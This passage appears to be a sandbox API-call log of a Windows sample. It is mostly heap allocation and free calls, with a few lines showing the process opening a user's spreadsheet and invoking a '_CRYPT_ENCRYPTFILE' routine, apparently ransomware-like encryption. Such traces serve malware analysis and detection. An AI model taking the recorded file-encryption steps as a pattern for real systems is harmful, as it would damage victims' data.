[0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.407] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0077.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca6d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.408] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0077.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0077.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0077.409] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\nwjd3dflnaf4dbf3yn.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0077.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0077.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0077.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0077.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0077.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.411] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.413] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.413] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.413] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.416] CloseHandle (hObject=0x258) returned 1 [0077.416] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.416] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.416] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf41dd590, ftCreationTime.dwHighDateTime=0x1d5d3cd, ftLastAccessTime.dwLowDateTime=0x5e6efc80, ftLastAccessTime.dwHighDateTime=0x1d59611, ftLastWriteTime.dwLowDateTime=0x5e6efc80, ftLastWriteTime.dwHighDateTime=0x1d59611, nFileSizeHigh=0x0, nFileSizeLow=0x13946, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="NwJd3dflnaF4DbF3Yn.xlsx", cAlternateFileName="NWJD3D~1.XLS")) returned 0x41ac500 [0077.416] FindClose (in: hFindFile=0x41ac500 | out: 